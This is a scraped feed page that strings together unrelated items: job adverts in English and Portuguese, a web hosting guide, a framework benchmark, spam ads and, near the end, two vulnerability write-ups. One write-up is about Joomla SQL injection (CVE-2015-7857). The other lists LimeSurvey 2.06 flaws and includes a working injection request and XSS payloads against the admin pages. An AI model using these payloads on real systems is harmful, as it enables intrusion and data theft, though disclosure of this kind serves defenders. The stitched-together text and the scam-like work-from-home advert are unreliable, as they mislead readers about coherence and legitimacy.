In order to apply, please send an email to jobs@nexusmods.com with your CV and why you'd be suitable for this role.
          We're Hiring: Web Developer Positions        
[color=orange][b]We're happy to report that both positions listed in this article have now been filled. As such, please don't send us your CV unless you are interested in us keeping it on record for when we are next looking to hire.[/b][/color]

We’re looking for two mid-level to senior web developers to join our team at our [url=http://www.nexusmods.com/games/news/13212/]new office in Exeter[/url], UK. The ideal candidate will be multi-skilled with experience working on high traffic websites.

[b][size=4]The Role[/size][/b]

You’d be joining our established web team which currently consists of 3 programmers whose primary responsibility is the Nexus Mods website and everything around it. Our stack consists of a mixture of technologies - Linux, Apache, NginX, PHP, MySQL, APC, Redis, Ruby, Rails, Bash, Git, Puppet, Vagrant, Javascript, Jquery, CSS, HTML and everything in between.

We’re currently hard at work on the next iteration of the Nexus Mods website and we have a long list of features that we’d like you to help us realise. We work as closely as possible to an agile project management scheme and every team member’s input is highly valued - we’re looking for people who can constructively discuss ideas in our programming meetings.

You’ll need production experience with PHP/MySQL and be comfortable with all related technologies.

Ultimately, we’re looking for people who are keen to learn and flexible in their approach with a strong web background.


[*][size=2]Working as part of the web team to maintain the Nexus Mods website, fixing bugs and adding new features.[/size]
[*][size=2]Participating in team meetings, keeping track of your workflow using project management tools.[/size]
[*][size=2]Working with everyone at Nexus Mods to shape the future of our platform.[/size]

[size=4][b]Requirements and Skills[/b][/size]

[*][size=2]Javascript & Javascript Frameworks[/size]
[*][size=2]CSS & HTML5[/size]
[*][size=2]Strong communication skills both verbally and written (English).[/size]
[*][size=2]Right to work in the UK[/size]

[size=4][b]Bonus Skills[/b][/size]

[*][size=2]Comfortable using Linux[/size]
[*][size=2]Sysadmin / Devops experience with LAMP[/size]
[*][size=2]Ruby / Rails[/size]
[*][size=2]Experience with code testing[/size]
[*][size=2]An understanding of games modding and knowledge of Nexus Mods[/size]
[*][size=2]A sense of humour[/size]
[*][size=2]A love of computer games[/size]

[size=4][b]Other Information[/b][/size]

[*][size=2]We will offer a competitive market rate salary dependent on your level.[/size]
[*][size=2]We will provide high spec hardware for you to work from in the office.[/size]
[*][size=2]For the right candidates we may be able to assist with relocation expenses and logistics. [/size]

[b][size=4]To Apply[/size][/b]

In order to apply, please send an email to jobs@nexusmods.com with your CV and why you’d be suitable for this role.
          Slackware переходит на MariaDB        
Разработчики Slackware отказываются от MySQL в пользу MariaDB.
          Web serving on the cheap        
Have you ever wanted to set up a small web server at home that can handle a small but reasonable amount of traffic? Perhaps you have a pet project or a home business and can't justify the cost of professional hosting. Maybe you have a fetish for low powered servers on small internet connections. Or possibly you just want to see if a Slashdotting of your home DSL line will trigger a call from your ISP. In any case, here are some tips on how to get the most out of a small setup.

Understand your limitations

If you don't have a large budget, then you obviously are going to have two big problems:
  • A lack of CPU power

  • A lack of bandwidth
Any effort to improve the performance of your small web site should be directly aimed at alleviating one of these two problems. I'll discuss each of these two issues below. There are other issues, such as a lack of RAM or disk space or disk performance, but usually your CPU and bandwidth will dominate the situation. I'll also ignore the most obvious solution to these problems, which is simply to buy a better processor and a bigger tube.


More often than not, bandwidth will be your biggest hurdle, especially if you're running your server on your home internet connection; most home connections have terrible upstream speeds, which really hurts you when you're a content producer and not a consumer. In addition, some connections, like DSL, will have high latencies.

To mitigate your lack of speed, you're simply going to need to push fewer bytes down the pipe. Look at your web pages and appreciate all of those pretty pictures while you can, because they're the first thing to go. A typical image can be anywhere from 10 to 200 kilobytes, which is simply too large for a small connection, especially if you have 20 of them on the front page. If you can stand it, remove every single GIF, JPEG, and PNG from your site. You may need to redesign your site around the new image-less paradigm, but you won't regret it in a few weeks when you get your bandwidth bill.

Next, move to a CSS-based design instead of a pure HTML one. You should be able to slim down your HTML this way, which will make it that much faster for a user to download. For an added bonus, you should put all of the CSS commands into a separate file. This will slow things down a tiny bit for the user's first visit to the site, but it also means that the same CSS file will be cached on every subsequent page view.

Finally, you should go for the biggest savings of all: compressed web pages. The idea is simple: the web server compress any text files before sending them to a user and the user's web browser will automatically decompress them before reading them. Every modern web browser supports compressed web pages, and you can see immense space savings from using it. Page compression can be a tricky thing to get right, especially if you're short on CPU power, because it obviously takes some effort by the web server to compress things. There are a few ways to get around this, one of which is to pre-render compressed versions of frequently accessed pages and then dish those out to users. You need to experiment with compression to see how much it affects your server's CPU.


If you're on a budget, then you most likely have an old computer with an outdated processor. This isn't necessarily a problem -- even very old computers can saturate a small internet connection -- but you're going to need to code your site correctly if you want to prevent it from being your big bottleneck.

The very first thing to go is the database. Sure, a database like MySQL is nice to have and does provide some convenience, but it can totally kill your web server's performance. Obviously, not everyone can do this, but many people can; it's usually a waste to store every page of a small web site in a full-fledged database system. Many small web sites could eliminate MySQL completely if they just stored data directly in files instead. For those that absolutely must have a database, you will need to at least remove any direct database query on your front page. Sometimes you can even just keep a copy of a MySQL query in a file and have a program update that file every so often.

Another way to avoid making database calls or any other expensive operation is to pre-render entire pages. If you know that your home page is only updated a few times a day, then why dynamically generate it every time someone views it? Just take the rendered page's HTML and save it in a file; the next time a user requests that page, just throw the rendered copy at them. You need to be careful to not give users stale pages, but it usually isn't too hard to figure it out on a small site. This concept ties in well with the previously mentioned tactic of saving pre-compressed copies of pages.

Finally, try to avoid web scripting in general. It is usually hard to avoid, given how much power it provides, but a poorly coded PHP or Perl page can chew through your CPU and RAM; it is best to use it only when it is truly needed. If you manage to free yourself of scripting on all but a few pages, you can even take advantage of a new class of lighter and faster web servers like lighttpd or tux; you'll still need to run a heavier web server process for those few scripted pages, but most of your traffic will hopefully run through the fast and light web server process.
          More Traffic More Sales Use New Auto Twitter Poster        

TwitterXtreme is a hybrid PHP MySQL script that runs on your own servers and engages in more that modest aggressive marketing tactics to sell your products and services online. If your looking for a fully automated Twitter poster that can fully create u



AUXILIAR DE PRODUÇÃO (oportunidade para pessoas com deficiência) - 1 vaga

Exigências: Acima de 18 anos, 2º grau completo. Não é necessário experiência anterior.

Atividade: Para atuar com rotinas na área de produção de alimentos.

Dias de trabalho: Trabalhará segunda a sexta.

Horário de trabalho: 07h00 as 16h50

Salário e Benefícios: R$ 600,00 + VT + Refeição no Local + Assistência Médica

Local: Vila Olímpia (Zona Sul de São Paulo)

Vanessa Orfão
Recursos Humanos
Psicóloga / Analista de RH
Tel: (11) 2198-1073 / Fax: (11) 3845-1981

Av.Dr. Cardoso de Melo, 671
04548-003 - São Paulo - SP


Visto a intenção de efetuar trabalho em casa eu lhe apresento umaótima oportunidade: Empresa de grande porte no ramo de mmn contrata produtores de maladireta e atendentes de telemarketing de ambos os sexos, maiores de 18anos. Trabalho simples,manual produzindo mala direta impressa ouatendendo telefones em sua casa. Despachamos todo o serviço até suaporta. Empresa oferece treinamento e prêmio incentivo sendo este umnotebook e impressora multifuncional sem sorteios, cumprindo meta deprodução (todos ganham). Ganhos iniciais de R$700,00 também porprodução mais ajuda de custos. Ótimo trabalho para estudantes,aposentados, donas de casa,´pessoas que não podem trabalhar fora oupessoas que querem aumentar sua renda. *Oportunidade válida para todoo Brasil. Interessados deverão efetuar o cadastro no site:www.trabalheemcasaoverdadeiro.com.br/422925, colocando a opçãorecebimento da proposta por e-mail, e você estará recebendo a propostaem seu e-mail.E-mail para contato ab.marketingstc@gmail.com. Obs: A empresa possue registro na junta comercial sob número de CNPJ05.147.869/0001-87. Qualquer dúvida consulte nosso cadastro no site dareceita federal.(http://www.receita. fazenda.gov.br/). AttEquipe de marketing stc

Segue vagas para divulgação. Local de trabalho em São Paulo

Número de Vagas: 2
Formação: Superior completo ou cursando ( área de Tecnologia)
Experiência de dois anos em implantação e suporte de Sistemas de Automação Comercial de restaurantes / varejo e TEF. Configuração de rede Windows; sistemas operacionais Windows (98,2000 Professional; XP Professional, vista Buniness); pacote office; elaboração de relatórios e manutenção de computadores.

Local de Trabalho: Escritório Central ? atuando Interno e Externo

Horário de trabalho: disponibilidade de horário

Outros Requisitos: possuir carro

Número de Vagas: 1
Formação: Superior completo - área de Tecnologia
Experiência em suporte ao usuário no sistema operacional Windows e aplicativos Office. Experiência nas instalações e configurações de softwares, hardware, sistemas, antivírus, firewall, impressoras, scanners e rede.

Local de Trabalho: Cozinha Central - Itapevi

Horário de trabalho: disponibilidade de horário

Outros Requisitos:

Número de Vagas: 2
Formação: Superior completo em Administração e áreas afins
Experiência em planejamento, especificações funcionais, protótipos, validação com usuários, teste integrado, homologações junto aos usuários, modelo de dados, conhecimento e aplicação de técnicas baseado no PMI (Project Management Institute).

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Conhecimentos de PMI

Número de Vagas: 1
Formação: Superior completo ma área de Tecnologia
Experiência em administração de redes Linux, Tomcat, virtualização, segurança de dados, backup, segurança da informação, telecomunicações, Windows, Office, instalações e configurações de software, hardware, sistemas, impressoras, scanners e rede. Desejável certificação e especialização na área.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Domínio do Idioma Inglês.

Número de Vagas: 1
Formação: Superior completo em Administração, Comunicação e Eventos.
Experiência em desenvolvimento de canal de vendas, administração, promoção e planejamento do canal de vendas. Sustentabilidade dos resultados.

Local de Trabalho: Externo

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Possuir carro

Número de Vagas: 1
Formação: Superior completo na área de Exatas
Experiência em liderança de Call Center, desempenho da operação, feedback, monitoria, desenvolvimento de projetos para aumento de produtividade, campanhas motivacionais. Controle e análise do orçamento, acompanhamento dos indicadores econômicos e operacionais. Elaboração de budget, revisão de processos financeiros e projeções. Manutenção do sistema de informações gerenciais, estudos de inovação voltados à área de planejamento e controle, identificando e propondo metodologias e práticas que melhor atendam às necessidades da empresa.

Gestor: Marco Botelho

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Número de Vagas: 1
Formação: Superior completo na área Administrativa ou Direito
Experiência na área de call center, irá administrar as anomalias frente ao levantamento dos clientes, administrar reclamações internas ? SAL: Serviço de Atendimento ao Lojista.

Acompanhar relatório junto a Analista de Planejamento, verificar anomalias, disceminar os indicadores de performance e tomar ações interventivas.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Número de Vagas: 1
Formação: Superior completo preferencialmente na área de Administração ou Engenharia de Alimentos
Experiência na área fast food, análise de planilhas de custo e relatórios gerenciais para tomada de decisão e realização de ações.

Capacidade de planejamento e visão estratégica irá acompanhar o desempenho dos agentes comerciais das lojas (Gerente, Supervisor de salão, Secretária Financeira, Garçom, Atendente, Caixa, Recepcionista, etc) para direcionamento dos problemas e intervenções corretivas e preventivas.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Ter carro próprio

Número de Vagas: 1
Formação: Superior completo preferencialmente na área de Administração ou Engenharia de Alimentos
Experiência na área fast food, análise de planilhas de custo e relatórios gerenciais para tomada de decisão e realização de ações.

Capacidade de planejamento e visão estratégica irá acompanhar o desempenho dos agentes comerciais das lojas (Gerente, Supervisor de salão, Secretária Financeira, Garçom, Atendente, Caixa, Recepcionista, etc) para direcionamento dos problemas e intervenções corretivas e preventivas.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Ter carro próprio

Número de Vagas: 1
Formação: Segundo Grau Completo
Experiência em rotinas administrativas irá atuar no estoque, manobrista, suporte interno e externo.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Ter habilitação

Número de Vagas: 1
Formação: Segundo Grau Incompleto ou Completo
Experiência com atendimento ao público, limpeza, atender as solicitações da empresa em diversos setores: limpeza geral, eventualmente atuar na copa.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Número de Vagas: 1
Formação: Segundo Grau Incompleto ou Completo
Experiência em atendimento ao público, irá atender as solicitações da empresa, servir coffee, reuniões.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos:

Sheila Cristina Vilela
Consultora de Recursos Humanos
Grupo Habib´s
Tel.: 5904-8450
Nextel: 55*54*41058


Gostaria de anunciar uma vaga para estagiario horarios das 12:00 às 16:00 região Central de São Paulo com a carteira da OAB de estagiário.

Sálario de R$ 700,00 + VT

enviar cv para:


Sueli Fatima da Rosa - administração
Godoy & Teixeira Advogados Associados
Rua Conselheiro Crispiniano, 29 - conjuntos 103/104/115
São Paulo - Capital - CEP: 01037-001
tel/fax: 55 11 3159-8900

Maior provedor de serviços de Internet da America Latina busca profissionais talentosos, que tenham como objetivo de carreira atuar em uma empresa criativa, dinâmica, com espírito jovem e inovador, com o perfil abaixo:

Analista de Sistemas Java (Pleno e Sênior).

04 vagas.

Requisitos Imprescindíveis:
Experiência em análise de sistemas, arquitetura e análise orientada a objetos
Domínio da linguagem de programação Java (J2EE e J2SE)
Conhecer a linguagem UML e suas aplicações, sendo capaz de transformar requisitos em documentação UML
Dominar a arquitetura MVC e desenvolver sistemas que a sigam.
Ter habilidade para desenvolver aplicações J2EE complexas usando EJBs, JMS, JMX e JDBC
Conhecer Framework Struts.

Completam o perfil desejado:
Superior Completo
Certificação de Programador Java da SUN (SCJP)
Design Patterns e XML
Inglês intermediário
Conhecimentos dos conceitos do PMI

Contratação CLT.
Local de trabalho Zona Sul.

Os interessados, enviar cv em formato.doc sob códg vaga: ANSIST_CLT.


Administrador de Dados:

01 vaga.

Requisitos Imprescindíveis:

Graduação completa, cursos correlatos a TI;

Experiência em banco de dados Oracle;

Experiência em PL/SQL;

Conhecimentos em teoria e ferramenta de modelagem de dados;

Experiência com otimização de queries;

Inglês técnico.

Desejável MySQL e SQL Server.

Local de trabalho: Zona Sul.

Contratação: CLT.

Os interessados enviar cv em formato.doc sob códg da vaga: AD_DADOS_CLT.


Gisele Nunes Domingues

Analista de RH
Triad Systems
São Paulo (11) 3054-6628
+ gisele.nunes@triadsystems.com.br

A Schwartz&Consultores Associados está contratando para um cliente de porte



(enviar cv para schwartzdeise@uol.com.br)


ü Responsável pela geração de demanda dos produtos/serviços junto às empresas do mercado corporativo;

ü Visão geral de soluções de mercado como Application Server, Banco de Dados, Ferramentas de Desenvolvimento, JAVA, Workflow, GED, Gestão do Conteúdo, Portais, etc...

ü Capacidade de discutir em alto nível, benefícios das soluções propostas;

ü Diagnosticar necessidades e apresentar soluções;

ü Estabelecer relacionamento de alto nível com os clientes;

ü Identificar novas oportunidades de negócios nas contas designadas;

ü Gerenciar o relacionamento com os parceiros de negócios.


ü Idade: acima de 25 anos;

ü Sexo: indiferente

ü Formação: Acadêmica: em Administração de Empresas, Marketing, Tecnologia da Informação, Engenharia ou áreas afins;

ü Experiência: mínima de cinco anos na comercialização de Tecnologias de softwares, hardwares e serviços profissionais para o mercado corporativo;

ü Perfil Pessoal: empreendedor, ambicioso, pró-ativo, criativo na apresentação de soluções, comunicativo. Ter iniciativa, habilidade de solucionar problemas, capacidade para trabalhar sob pressão;

§ Ter a capacidade de direcionar a melhor estratégia para atingir seus objetivos;

§ Excelente nível de relacionamento com clientes e companheiros de trabalho;

ü Idiomas: inglês intermediário.


ü Empresa atua na área de outsourcing especializada em serviços e soluções de TI para ambientes de missão crítica;;

ü Ramo: Integradora e Prestadora de Serviços;

ü Nível Hierárquico: Executivo de Negócios;

ü Faixa Salarial: A combinar (os produtos e serviços que comercializamos se posicionam no mercado como alto valor agregado às atividades dos nossos prospects e clientes. Desta maneira, temos que identificar qual o potencial dos candidatos versus os projetos que eles devem acompanhar/desenvolver);

ü Local de Trabalho: São Paulo – SP;

Ø Observações Finais: Necessitamos 1 (um) profissional com disponibilidade imediata.
          The great web technology shootout - Round 1: A quick glance at the landscape        

A lot of the information below is out of date. Please see the new framework shootout page for the latest benchmarks.

Recently I went on a benchmarking spree and decided to throw ApacheBench at a bunch of the different web development technology platforms I interact with on a day-to-day basis. The results were interesting enough to me that I decided I'd take a post to share them here.

Disclaimer: The following test results should be taken with a *massive* grain of salt. If you know anything about benchmarking, you will know that the slightest adjustments have the potential to change things drastically. While I have tried to perform each test as fairly and accurately as possible, it would be foolish to consider these results as scientific in any way. It should also be noted that my goal here was not to see how fast each technology performs at its most optimized configuration, but rather what a minimal out-of-the-box experience looks like.

Test platform info:

  • The hardware was an Intel Core2Quad Q9300, 2.5Ghz, 6MB Cache, 1333FSB, 2GB DDR RAM.
  • The OS was CentOS v5.3 32-bit with a standard Apache Webserver setup.
  • ApacheBench was used with only the -n and -c flags (1000 requests for the PHP frameworks, 5000 requests for everything else).
  • Each ApacheBench test was run 5-10 times, with the "optimum average" chosen as the numbers represented here.
  • The PHP tests were done using the standard Apache PHP module.
  • The mod_wsgi tests were done in daemon mode set to 2 processes/15 threads.
  • The SQL tests were done with mysqli ($mysql->query()) on PHP, and SQLAlchemy (conn.execute()) on Python fetching and printing 5 rows of data from a sample database.

Apache v2.2.3

We will start with the raw Apache benchmark.

For this test, Apache loaded a simple HTML file with random text:

Document Length:        6537 bytes
Requests per second:    8356.23 [#/sec] (mean)

As expected, Apache is lightning fast.

Ok, so now that we've set the high water mark, let's take a look at some popular web technology platforms...

PHP v5.2.8

For this test, I created a PHP file that simply printed the $_SERVER array and some random text:

Document Length:        6135 bytes
Requests per second:    2812.22 [#/sec] (mean)

Next, I decided to add some mysqli() code to connect to a database and print out a few rows of data:

Document Length:        283 bytes
Requests per second:    2135.46 [#/sec] (mean)

Not at all bad, but who really wants to build a webapp using plain old PHP anymore?

Next I decided to test the two PHP frameworks that I am most familiar with.

CakePHP v1.2.5

For this test, I did a basic CakePHP install, and added a route that printed "hello world" from a template:

Document Length:        944 bytes
Requests per second:    42.00 [#/sec] (mean)

As you can see, frameworks can be a blessing and a curse. On a side note, CakePHP was the only test that gave me failed requests.

Kohana v2.3.4

For this test, I did a basic install and loaded Kohana's default welcome/index setup (which seemed lightweight enough to me to qualify as the test focal point):

Document Length:        1987 bytes
Requests per second:    100.11 [#/sec] (mean)

Kohana fared much better than CakePHP, but it appears as though PHP's speed breaks down quickly once you start building a framework around it.

Python v2.5.4

Unlike PHP, Python wasn't specifically created for the web. However, several years ago the WSGI spec was introduced which makes building web applications with Python a breeze. There are many different ways to depoly a WSGI app, but my tests were limited to Python's built-in WSGIServer, and Apache's mod_wsgi.


For this test, I used WSGI.org's test.wsgi:

Document Length:        4123 bytes
Requests per second:    1658.35 [#/sec] (mean)

These results were quite impressive to me, considering that this is pure Python at work.


mod_wsgi is Apache's module to process WSGI scripts. This test used the exact same script as the previous WSGIServer example:

Document Length:        9552 bytes
Requests per second:    3994.30 [#/sec] (mean)

Don't look now, but those results are better than the vanilla PHP test!

Next, I added SQLAlchemy imports to the test file and did a conn.execute(), in an attempt to try to mimic the PHP mysqli() test:

Document Length:        10212 bytes
Requests per second:    3379.87 [#/sec] (mean)

I expected to lose quite a bit of speed with the introduction of an ORM, but it looks like SQLAlchemy is quite fast. These results were still over 1,000reqs/s more than the PHP example.


There's been a lot of buzz lately about the new TornadoServer, so I thought I'd throw it in the mix. This test uses their basic "hello world" example:

Document Length:        12 bytes
Requests per second:    3330.00 [#/sec] (mean)

Nothing shocking here at first glance, but the Tornado is built to handle extreme loads. So, I increased the concurrency to 1,000 and threw 10,000 requests at it:

Document Length:        12 bytes
Concurrency Level:      1000
Complete requests:      10000
Requests per second:    3288.15 [#/sec] (mean)

Almost exactly the same results! On a side note, none of the other tests subjects were able to handle a concurrency of 1,000.

TurboGears v2.0.3 (mod_wsgi)

TurboGears has quickly become my framework of choice, so naturally it was the first Python framework I tested.

For this test I setup a default quickstart project, and then added a hello() controller method which simply returned a "hello world" string:

Document Length:        11 bytes
Requests per second:    470.18 [#/sec] (mean)

Next, I added a simple Genshi template with 1 level of inheritance:

Document Length:        1351 bytes
Requests per second:    143.26 [#/sec] (mean)

While those results are not terrible, they should encourage you to check out the other templating options.

Next, I performed the same test with Mako:

Document Length:        1534 bytes
Requests per second:    394.41 [#/sec] (mean)

As you can see, Mako is significantly faster than Genshi.

TurboGears also supports Jinja2, so I thought I'd also see how it held up:

Document Length:        1020 bytes
Requests per second:    401.04 [#/sec] (mean)

I was not expecting Jinja2 to be faster than Mako, so I am not entirely sure about these results. However, the difference is only slight, and might have something to do with the fact that the dotted template names finder is disabled for Jinja templates.

Pylons v0.9.7 (mod_wsgi)

Mark Ramm (the current development lead of TurboGears) has been quoted as saying "TurboGears is to Pylons as Ubuntu is to Debian." With that in mind, I naturally wanted to see how much speed I was losing with TurboGears' "additions".

For this test I tried to mimic the first TurboGears test (basic layout, returning a string):

Document Length:        11 bytes
Requests per second:    1961.00 [#/sec] (mean)

While I was expecting a gain from TurboGears' omissions, I wasn't quite expecting over four times the increase. I can only assume that the bare Pylons setup is pretty minimal, while TurboGears bootstraps a lot of stuff on for you by default.

Duplicating the Mako test in Pylons was also quite fast:

Document Length:        9743 bytes
Requests per second:    1183.39 [#/sec] (mean)

Bottle v0.5.7 (mod_wsgi)

Bottle caught my attention recently as a minimalistic Python web framework, so I thought I'd put it through the grind as well.

For this test, I used their simple "hello world" example:

Document Length:        12 bytes
Requests per second:    3912.43 [#/sec] (mean)

As you can see, Bottle is very close to bare WSGI as far as speed goes. On a side note, adding a sample template using Bottle's default templating package didn't seem to change these numbers at all.

Next I tested Bottle with its templating system switched to Mako:

Document Length:        41 bytes
Requests per second:    3134.61 [#/sec] (mean)

Then I added a SQLAlchemy and performed a query:

Document Length:        9374 bytes
Requests per second:    2503.27 [#/sec] (mean)

What was exciting to me about this test was that I found myself looking at a minimal Python framework equipped with a full templating system and ORM which all performed faster than the PHP+mysqli() test.

Django v1.1 (mod_wsgi)

I don't use Django, but I thought it would be worth including in this report. This is a basic Django setup printing out a simple hello world template:

Document Length:        1471 bytes
Requests per second:    564.41 [#/sec] (mean)

As expected, a minimal Django setup is quite fast. (Note: This test included a SQLite database query.)

Ruby On Rails v2.2.3 (mod_passenger)

I also don't use Rails, but I figured this report would be incomplete without Rails on the list. So, I took MediaTemple's Rails test app and loaded up a test page:

Document Length:        1291 bytes
Requests per second:    433.57 [#/sec] (mean)

Note that the test app used here is doing a little bit more than just returning "Hello World".

My Conclusions

As I said in the disclaimer, to arrive at any sort of decisive conclusions based on these numbers alone would be foolish. However, here is what all of this left me thinking:

  • All of these technologies performed adequately for use with most projects.
  • CakePHP was the only test that produced less than 100 requests per second. However, there are many articles available on optimizing CakePHP.
  • These results made me wish I had moved away from PHP much earlier in my web development carrier. There are just better options these days when it comes to choosing a web development language (imho). If you must use PHP for a large project, I strongly suggest that you look into an accelerator.
  • The Bottle+Mako+SQLAlchemy results struck me as an extremely minimal drop-in replacement for simple PHP sites.
  • mod_wsgi is a huge winner in deploying Python webapps. Way to go Graham!
  • Do your own bencharking, because your mileage **will* vary*!

Like what you've seen here? Check out Round 2.

          Guida: Android su Mac con RemixOS        
E' da poco uscito Remix OS, un sistema operativo basato su Android, installabile nativamente su Desktop (sia Mac che Windows). Una volta scaricato il file dal sito ufficiale, non ci resta che scompare l'archivio, dove all'interno troveremo l'.iso ed un tool che facilita la creazione della penna USB, ma solo per chi usa Windows. Gli utenti [...]
          PHP5: Configurare “date.timezone” su Linux        
Se, aggiornando a PHP5 (qui per come farlo su Debian), anche voi incorrete in un "Warning" dovuto al date.timezone, di seguito è spiegato come risolvere, in pochi semplici passi. L'avvertimento in questione è il seguente: Warning: error_log(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone [...]
          Kommentarer till Och sÃ¥ var man tillbaka pÃ¥ kontoret. av http://www.hausratversicherung.tech/        
Muy buena la explicación! Lo seguí paso por paso en xampp 1.7.1 y quedo funcionando muy bien. Ahora tengo que trabajar en un código que rescate la clave de usuario desde una tabla en mysql y se la envíe por correo. Acepto sugerencias SaludosRonaldo._
          How to Backup a Live MySQL DB Without Locking Tables Using mysqldump        

Backing up MySQL is not very hard — you just run mysqldump and output to a file — but it’s also not really d…

Click Here to Continue Reading

          How to Exclude Tables from MySQL Exports Using mysqldump        

While setting up a new testing environment to help development make slightly less bugs, I was looking at how to transfer the database…

Click Here to Continue Reading

          How to Backup / Export a Single Table from a MySQL Database        

The other day I was testing a feature on my development box when I realized my local data was really out of date, and if I was going to get anywhere with my testing, I needed some recent data from production.

Click Here to Continue Reading

          How to See Which MySQL Tables are Taking the Most Space        

Database backups are one of those things that just keep getting bigger and bigger until they consume all the matter in the world.

Click Here to Continue Reading

          Mysql - Recursive Sql Query         
Recursive SQL query Mysql 如果只有一個爸爸或一個媽媽時, 可以用一個QUERY 來解決這問題
          Joomla CVE-2015-7857 writeup         
(I wrote this as a 'note' in 14.12.2015 but in case that all information are already public,
below you will find proof of concept and little write-up for vulnerability described in this CVE.)

Few weeks ago Asaf Orpani found SQL injection vulnerability in 'latest' (in those days) Joomla CMS.
After CVE: vulnerable is version line from 3.2 to 3.4.

Because I was involved in other projects,  I found information about this CVE just few days ago... When I saw that Asaf published more details about possible exploitaton (then CVE), I was wondering
if I will be able to write small proof-of-concept code to use it later during other projects.

So, let's get to work!

Trustwave SpiderLabs mentioned that:

„CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.”

Cool. ;]

I think that "all technical details"  you will find described at the SpiderLabs Blog so there is no point to copy/paste it here again.

What we will actually need is just one screen from Trustwave's Blog: one with GET request.
We can observe that 'for exploitation' we can create just a simple 'one liner' GET. We will use
python for this. ;)

Let's write a small web-client (GET request, based on urllib2 library).
Our goal is: type IP/hostname and click enter to get DB version. ;)

This case will be a little different than one described on SpiderLab's Blog, because we don't want to wait for admin to log-in. We don't need logged-in admin on webapp/server during our pentest. ;P

Our proof-of-concept payload, will use simple "version()"injected into SQL query,
when user will visit link with 'list[select]' parameter. On my localhost server we
will use LAMP (on Debian8) and Joomla 3.4.4.

By the way, it will be good to know if Joomla (found in our 'testing scope') is vulnerable or not.

I assume that you have already installed Joomla (3.4.4).
If not, unzip it and findout where we can find (if any) information
about the version:

$ grep  --color –nr –e 3.4.4 ./ 

Below you will find sample screen presenting strings containing 'version':

Now, we see a nice XML file containing version of Joomla installed on my box.
(It's good to mention here, that this file can be grabbed by anyone. You don't need
any credentials.)

So let's add few lines to our 'one liner' python script, to check if tested Joomla
is vulnerable or not. Sample code would look like this:
As you can see sqli(host) function is now commented out in the code. We only
want to see the version number. (Checking if you're Joomla installation got this file 
is left as an exercise for the reader.)

Joomla 3... SQL Injection
I tried this poc against 3.2, 3.3 and 3.4.4 installed on my box and to be honest, 
I was able to use it only against 3.4. (If you want - let me know in comments 
against which version installed on your box this poc worked. Thanks!;))

Modified version of this code is below:

Below is the screen of testing vulnerable Joomla 3.4.4 installed on my localhost.
Simple poc to get the version of MySQL available on the server:

          New version of Lime Survey         
As far as I know LimeSurvey is already updated, so below you will find all described vulnerabilities I found nearly 2 months ago during some small 'code review' exercises.

Response from LimeSurvey Team was very fast! :)

Found: 4.11.2015
Sent:    5.11.2015
Resp:   5.11.2015

AFAIK all findings were fixed in 48h. So... here we go:

Title        : LimeSurvey 2.06 - Multiple vulnerabilities
Version   : stable-release-limesurvey206plus-build151018.zip
Found     : 04.11.2015



    All described vulnerabilities were found in section related to admin.

    Case I ------------ SQL Injection in "searchcondition"
    Case II ----------- XSS in "page"
    Case III ---------- XSS in "filterbea"
    Case IV ---------- Information disclosure a.k.a. 'method enumeration'
    Case V ----------- XSS in "templatename"

    Case VI ---------- XSS in "lang" 

CASE I: SQL Injection in "searchcondition"

POST /limesurvey/index.php/admin/participants/sa/getParticipantsResults_json HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Length: 192
Cookie: PHPSESSID=vmu9d3vriajf213m0u7lmdbl36; YII_CSRF_TOKEN=c36af5a641de36a66bc377f9e85a84b81e234ff0
Connection: close
Pragma: no-cache
Cache-Control: no-cache



After enabling log's in MySQL, we can find:


151104  8:55:13    71 Connect   root@localhost on limesurvey
                   71 Query     SET NAMES 'utf8'
                   71 Query     SELECT * FROM `lime_settings_global` `t`
                   71 Query     SELECT * FROM `lime_plugins` `t` WHERE `t`.`active`=1
                   71 Query     SELECT * FROM `lime_permissions` `t` WHERE `t`.`entity_id`=0 AND `t`.`e                                                                 ntity`='global' AND `t`.`uid`=1 AND `t`.`permission`='superadmin' LIMIT 1
                   71 Query     SELECT * FROM `lime_participant_attribute_names` `t` WHERE visible = 'T                                                                 RUE'
                   71 Query     SELECT `lime_participant_attribute_names`.* FROM `lime_participant_attribute_names`
ORDER BY `lime_participant_attribute_names`.`attribute_id`
                   71 Query     SELECT count(*) as cnt FROM `lime_participants` `p` left join lime_users luser
                   ON luser.uid=p.owner_uid WHERE ('>"><body/onload=alert(123123)> = 'a')
                   71 Quit


Response on web should looks similar to this one (btw: one below is of course for different payload):


<h1>Internal Server Error</h1&g